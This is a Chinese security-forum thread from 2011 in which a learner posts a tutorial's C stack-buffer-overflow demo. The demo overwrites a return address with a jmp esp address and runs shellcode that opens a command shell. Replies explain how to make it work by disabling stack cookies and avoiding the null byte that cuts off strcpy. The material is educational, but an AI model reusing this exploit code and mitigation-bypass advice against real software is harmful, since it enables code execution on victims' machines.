首页
社区
课程
招聘
[旧帖] 最简单的缓冲区溢出求助? 0.00雪花
发表于: 2011-9-26 14:22 3933

[旧帖] 最简单的缓冲区溢出求助? 0.00雪花

2011-9-26 14:22
3933
#include <stdio.h>
#include <string.h>

char name[] =   "\x41\x41\x41\x41"  //name[0]-name[3]
  "\x41\x41\x41\x41"  //name[4]-name[7]
  "\x41\x41\x41\x41"  //覆盖ebp
  "\x12\x45\xfa\x7f" //覆盖成jmp esp的通用地址为0x7ffa4512
//下面代码为弹出一个cmd窗口
"\x55\x89\xE5\x31\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56"
  "\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6\x45\xFB\x44"
    "\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2\x81"
    "\xEC\x10\x00\x00\x00\xC6\x45\xF4\x63\xC6\x45\xF5\x6F\xC6\x45\xF6\x6D\xC6\x45\xF7"
    "\x6D\xC6\x45\xF8\x61\xC6\x45\xF9\x6E\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC"
    "\x63\xC6\x45\xFD\x6F\xC6\x45\xFE\x6D\xC6\x45\xFF\x00\x8D\x45\xF4\x50\xB8\xC7\x93"
    "\xBF\x77\xFF\xD0\x89\xEC\x5D";

int main()
{
       

       
        char output[8];
       
        strcpy(output, name);
       
       
        for(int i=0;i<8&&output[i];i++)
               
                printf("\\0x%x",output[i]);
       
       
        return 0;
}

这是Q版缓冲区溢出上的教程,但是在我的机器上却不能弹出cmd窗口?

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (8)
雪    币: 316
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
弹出cmd窗口部分的shellcode代码我已经测试过,可以运行。。。
2011-9-26 14:24
0
雪    币: 414
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
编译环境是?
是Debug版还是Release版?
2011-9-26 14:40
0
雪    币: 188
活跃值: (85)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
4
#include <stdio.h>
#include <string.h>

char name[] = {
0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,
0x12,0x45,0xfa,0x7f,
0x55,0x89,0xE5,0x31,0xC0,0x50,0x50,0x50,0xC6,0x45,0xF4,0x4D,0xC6,0x45,0xF5,0x53,0xC6,0x45,0xF6,0x56,
0xC6,0x45,0xF7,0x43,0xC6,0x45,0xF8,0x52,0xC6,0x45,0xF9,0x54,0xC6,0x45,0xFA,0x2E,0xC6,0x45,0xFB,0x44,
0xC6,0x45,0xFC,0x4C,0xC6,0x45,0xFD,0x4C,0x8D,0x45,0xF4,0x50,0xBA,0x7B,0x1D,0x80,0x7C,0xFF,0xD2,0x81,
0xEC,0x10,0x00,0x00,0x00,0xC6,0x45,0xF4,0x63,0xC6,0x45,0xF5,0x6F,0xC6,0x45,0xF6,0x6D,0xC6,0x45,0xF7,
0x6D,0xC6,0x45,0xF8,0x61,0xC6,0x45,0xF9,0x6E,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,
0x63,0xC6,0x45,0xFD,0x6F,0xC6,0x45,0xFE,0x6D,0xC6,0x45,0xFF,0x00,0x8D,0x45,0xF4,0x50,0xB8,0xC7,0x93,
0xBF,0x77,0xFF,0xD0,0x89,0xEC,0x5D
};

void overrun( )
{
char output[8];
strcpy(output, name);
}
int main()
{



/*strcpy(output, name);*/

overrun();

char output[8];
for(int i=0;i<8&&output;i++)

printf("\\0x%x",output);


return 0;
}


我这里调试下发现是可以进入shellcode 的
没明白你的 cmd窗口是指什么? 多出来一个么 这个不能只有自带地那个
你现在写的是需要main()函数退出时才执行shellcode

ps:需要 release编译 工程配置里去掉cookie安全检查
2011-9-26 15:15
0
雪    币: 128
活跃值: (27)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
5
不成功才有意思,
所以才要耐心的单步debug,这样肯定能真相大白,祝好运
2011-9-26 15:52
0
雪    币: 30
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
不是很清楚 不好意思。。。
2011-9-26 16:02
0
雪    币: 188
活跃值: (85)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
7
0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,
0x12,0x45,0xfa,0x7f,
0x55,0x89,0xE5,0x31,0xC0,0x50,0x50,0x50,0xC6,0x45,0xF4,0x4D,0xC6,0x45,0xF5,0x53,0xC6,0x45,0xF6,0x56,
0xC6,0x45,0xF7,0x43,0xC6,0x45,0xF8,0x52,0xC6,0x45,0xF9,0x54,0xC6,0x45,0xFA,0x2E,0xC6,0x45,0xFB,0x44,
0xC6,0x45,0xFC,0x4C,0xC6,0x45,0xFD,0x4C,0x8D,0x45,0xF4,0x50,0xBA,0x7B,0x1D,0x80,0x7C,0xFF,0xD2,0x81,
0xEC,0x10,0x00,0x00,0x00,0xC6,0x45,0xF4,0x63,0xC6,0x45,0xF5,0x6F,0xC6,0x45,0xF6,0x6D,0xC6,0x45,0xF7,
0x6D,0xC6,0x45,0xF8,0x61,0xC6,0x45,0xF9,0x6E,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,
0x63,0xC6,0x45,0xFD,0x6F,0xC6,0x45,0xFE,0x6D,0xC6,0x45,0xFF,0x00,0x8D,0x45,0xF4,0x50,0xB8,0xC7,0x93,
0xBF,0x77,0xFF,0xD0,0x89,0xEC,0x5D


搂主你用的是字符处理函数进行溢出 遇到00 截断了
用memcpy 试一下估计就好用了
或者你自己把00替换,然后再写解码shellcode

不过我将你name中实际需要运行的部分声明成 void fn() 来执行都会crash
2011-9-26 16:22
0
雪    币: 139
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
这个不清楚,帮你顶!
2011-9-26 16:38
0
雪    币: 16
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
haw
9
用OD调试一下不就知道了
2011-9-28 11:06
0
游客
登录 | 注册 方可回帖
返回
//